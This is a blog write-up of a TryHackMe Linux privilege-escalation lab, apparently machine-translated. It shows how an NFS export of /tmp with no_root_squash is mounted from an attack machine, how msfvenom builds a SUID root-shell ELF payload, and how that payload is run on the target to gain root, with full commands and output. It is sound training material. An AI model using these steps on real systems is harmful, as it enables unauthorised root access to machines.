![[TryHackMe] Expanding privileges by misusing the no_root_squash on NFS mount! Linux PrivEsc Writeup Part9](https://hack-lab-256.com/wp-content/uploads/2023/04/hack-lab-256-samnail-15.jpg)
This time, we will try "Elevation of Privilege Using the NFS Mount no_root_squash".
The target machine uses the Room below of TryHackMe.
"TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc "
This article is part 9.
If you would like to check Writeup for Linux PrivEsc with TryHackMe, please also check Electronic privileges exploiting backups of history files, config files, and important files
Pochip
Pochip
Pochip
Pochip
Preparation
First, start the target machine with Start Machine.
It's OK if IP Address is displayed.
This time, since it is escalated to privileges, I'll check to see where it can be connected via ssh.
Connect using "user/password321" as shown in TryHackMe.
┌──(hacklab㉿hacklab)-[~/tryhackme/linuxprv] └─$ ssh user@10.10.175.49 130 ⨯ user@10.10.175.49's password: Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri May 15 06:41:23 2020 from 192.168.1.125NFS
Files created via NFS will inherit the remote user's ID.
If the user is root and root squash is enabled (no_root_squash is not specified), the ID will be set to "nobody" instead.
Conversely, if root squash is disabled (no_root_squash is specified), please note that you have the same level of access privileges as root.
Let's check the NFS sharing configuration for Debian VM.
user@debian:~$ cat /etc/exports # /etc/exports: the access control list for filesystems which may be exported # to NFS clients. See exports(5). # # Example for NFSv2 and NFSv3: # /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check) # # Example for NFSv4: # /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check) # /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check) # /tmp *(rw,sync,insecure,no_root_squash,no_subtree_check) #/tmp *(rw,sync,insecure,no_subtree_check)Have you noticed that no_root_squash is specified in "/tmp"?
Next, we will exploit no_root_squash in "/tmp" to escalate privileges.
First, let's root the attack machine. (Even on the target machine, the same privileges as root on /tmp.)
┌──(hacklab㉿hacklab)-[~] └─$ sudo su ┌──(root💀hacklab)-[/home/hacklab] └─# Next, create a mount point on the attack machine and mount /tmp.
┌──(root💀hacklab)-[/home/hacklab] └─# mkdir /tmp/nfs ┌──(root💀hacklab)-[/home/hacklab] └─# mount -o rw,vers=3 10.10.175.49:/tmp /tmp/nfsNext, use msfvenom to generate a payload that calls /bin/bash.
The generated payload will be saved in /tmp/nfs.
┌──(root💀hacklab)-[/home/hacklab] └─# msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 48 bytes Final size of elf file: 132 bytes Saved as: /tmp/nfs/shell.elfGrant SUID privileges so that once the target user executes it is run with owner privileges. (The root of the attack machine is considered the root of the target machine, and by granting SUID privileges, other users of the target machine can also be run with root privileges.)
┌──(root💀hacklab)-[/home/hacklab] └─# chmod +xs /tmp/nfs/shell.elfOnce you've done this, go back to the target machine and run the shell.elf you just saved.
user@debian:~$ /tmp/shell.elf bash-4.1# whoami rootI successfully obtained root privileges.
summary
This time, I tried "Privilege Elevation Using the NFS Mount no_root_squash."
Finally, did you notice that the issue of running with SUID privileges has arisen?
What is SUID permission? If you think so, please also refer to Electroduction using SUID/SGID executables
References and Sites
--
![[HackTheBox] What to do if "An error of type HTTPClient::ReceiveTimeoutError happened, message is executed expired" appears in Evil-WinRM](https://hack-lab-256.com/wp-content/uploads/2023/09/hack-lab-256-samnail-4-300x169.jpg)
![[CVE-2015-3306] I enumerated the shared Samba, manipulate a vulnerable version of proftpd, and escalated privileges by manipulating path variables! TryHackMe Kenobi Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-2-300x169.jpg)
![[Permanent CTF for beginners] setodaNote CTF WEB Writeup! Recommended for getting a sense of CTF!](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-1-1-300x169.jpg)
![[TryHackMe] We conducted packet analysis using wireshark to investigate the intrusion of ssh-backdoor! Overpass2 Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-300x169.jpg)
![[CVE-2018-16763] fuel CMS 1.4.1 - I converted Remote Code Execution (1) to python 3 and hacked it! TryHackMe Ignite Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-25-300x169.jpg)
![[TryHackMe] I used SSH2John to extract the hash from the private key and hacked the password with John the Ripper! Overpass Writeup](https://hack-lab-256.com/wp-content/uploads/2023/07/hack-lab-256-samnail-24-300x169.jpg)
![[TryHackMe] I tried infiltrating a Windows machine with a ret2esp attack (Buffer Overflow)! Brainstorm Writeup](https://hack-lab-256.com/wp-content/uploads/2023/06/hack-lab-256-samnail-23-300x169.jpg)